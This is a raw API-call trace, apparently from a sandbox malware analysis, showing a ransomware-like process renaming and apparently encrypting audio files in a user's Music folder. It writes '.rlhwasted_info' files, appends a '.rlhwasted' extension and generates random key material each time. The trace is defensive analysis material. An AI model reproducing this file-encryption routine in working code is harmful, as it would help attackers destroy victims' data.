0x0 [0194.430] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.430] lstrcpyW (in: lpString1=0x6d45ee, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JiubcnRU-kG.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jiubcnru-kg.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JiubcnRU-kG.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jiubcnru-kg.m4a.rlhwasted")) returned 1 [0194.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\JiubcnRU-kG.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jiubcnru-kg.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.431] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0194.434] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.435] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.435] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.436] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.437] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.437] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.446] SetEndOfFile (hFile=0x124) returned 1 [0194.448] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.448] CloseHandle (hObject=0x124) returned 1 [0194.450] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.450] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.451] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.452] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.452] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K4dLTOkEJuuNOthc.wav") returned 60 [0194.452] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0194.452] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.452] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.452] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.453] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.453] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K4dLTOkEJuuNOthc.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k4dltokejuunothc.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.453] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.454] SetEndOfFile (hFile=0x124) returned 1 [0194.454] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.455] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.455] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K4dLTOkEJuuNOthc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k4dltokejuunothc.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K4dLTOkEJuuNOthc.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k4dltokejuunothc.wav.rlhwasted")) returned 1 [0194.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K4dLTOkEJuuNOthc.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k4dltokejuunothc.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0194.455] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.456] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.457] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.457] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.457] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.457] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.458] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.466] SetEndOfFile (hFile=0x124) returned 1 [0194.469] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.469] CloseHandle (hObject=0x124) returned 1 [0194.470] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.471] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.471] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.471] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.472] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OcZ4F8KsBEdKpEJP.wav") returned 60 [0194.472] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0194.472] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.472] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.472] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.473] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.473] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OcZ4F8KsBEdKpEJP.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ocz4f8ksbedkpejp.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.473] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.474] SetEndOfFile (hFile=0x124) returned 1 [0194.474] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.474] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.474] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OcZ4F8KsBEdKpEJP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ocz4f8ksbedkpejp.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OcZ4F8KsBEdKpEJP.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ocz4f8ksbedkpejp.wav.rlhwasted")) returned 1 [0194.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OcZ4F8KsBEdKpEJP.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ocz4f8ksbedkpejp.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.685] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0194.689] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.690] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e8c68 | out: pbBuffer=0x6e8c68) returned 1 [0194.690] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.690] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.691] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.691] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.705] SetEndOfFile (hFile=0x124) returned 1 [0194.708] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.708] CloseHandle (hObject=0x124) returned 1 [0194.710] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0194.710] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.711] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.711] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\-s904D_WtQRTJPT9J.m4a") returned 91 [0194.711] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x70cfe8 [0194.711] lstrcpyW (in: lpString1=0x70d09e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.711] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.711] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.712] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.712] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\-s904D_WtQRTJPT9J.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\-s904d_wtqrtjpt9j.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.713] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.715] SetEndOfFile (hFile=0x124) returned 1 [0194.718] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.718] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.718] lstrcpyW (in: lpString1=0x70d09e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\-s904D_WtQRTJPT9J.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\-s904d_wtqrtjpt9j.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\-s904D_WtQRTJPT9J.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\-s904d_wtqrtjpt9j.m4a.rlhwasted")) returned 1 [0194.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\-s904D_WtQRTJPT9J.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\-s904d_wtqrtjpt9j.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0194.720] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.720] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.722] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e8c68 | out: pbBuffer=0x6e8c68) returned 1 [0194.722] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.722] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.723] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.723] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.782] SetEndOfFile (hFile=0x124) returned 1 [0194.785] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.785] CloseHandle (hObject=0x124) returned 1 [0194.786] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0194.787] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.788] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.788] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.788] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\3GdkWGEFM-rO0Nd.mp3") returned 89 [0194.788] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2bc) returned 0x70cfe8 [0194.788] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.788] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.788] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.789] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.789] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\3GdkWGEFM-rO0Nd.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\3gdkwgefm-ro0nd.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.790] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.791] SetEndOfFile (hFile=0x124) returned 1 [0194.791] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.791] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.791] lstrcpyW (in: lpString1=0x70d09a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\3GdkWGEFM-rO0Nd.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\3gdkwgefm-ro0nd.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\3GdkWGEFM-rO0Nd.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\3gdkwgefm-ro0nd.mp3.rlhwasted")) returned 1 [0194.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\3GdkWGEFM-rO0Nd.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\3gdkwgefm-ro0nd.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0194.793] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0194.795] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.796] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.796] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.796] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0194.797] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0194.797] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.806] SetEndOfFile (hFile=0x124) returned 1 [0194.809] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.809] CloseHandle (hObject=0x124) returned 1 [0194.811] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0194.812] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0194.813] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0194.813] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\Bc0bHHKPDK2MVIpE.mp3") returned 90 [0194.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2be) returned 0x70cfe8 [0194.813] lstrcpyW (in: lpString1=0x70d09c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0194.813] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0194.813] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0194.814] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0194.814] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\Bc0bHHKPDK2MVIpE.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\bc0bhhkpdk2mvipe.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0194.815] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0194.816] SetEndOfFile (hFile=0x124) returned 1 [0194.816] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.816] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0194.816] lstrcpyW (in: lpString1=0x70d09c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0194.816] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\Bc0bHHKPDK2MVIpE.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\bc0bhhkpdk2mvipe.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\Bc0bHHKPDK2MVIpE.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\bc0bhhkpdk2mvipe.mp3.rlhwasted")) returned 1 [0194.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\Bc0bHHKPDK2MVIpE.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\bc0bhhkpdk2mvipe.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0194.818] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0194.820] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0194.821] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0194.821] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0194.821] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0195.011] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.011] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.022] SetEndOfFile (hFile=0x124) returned 1 [0195.024] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: 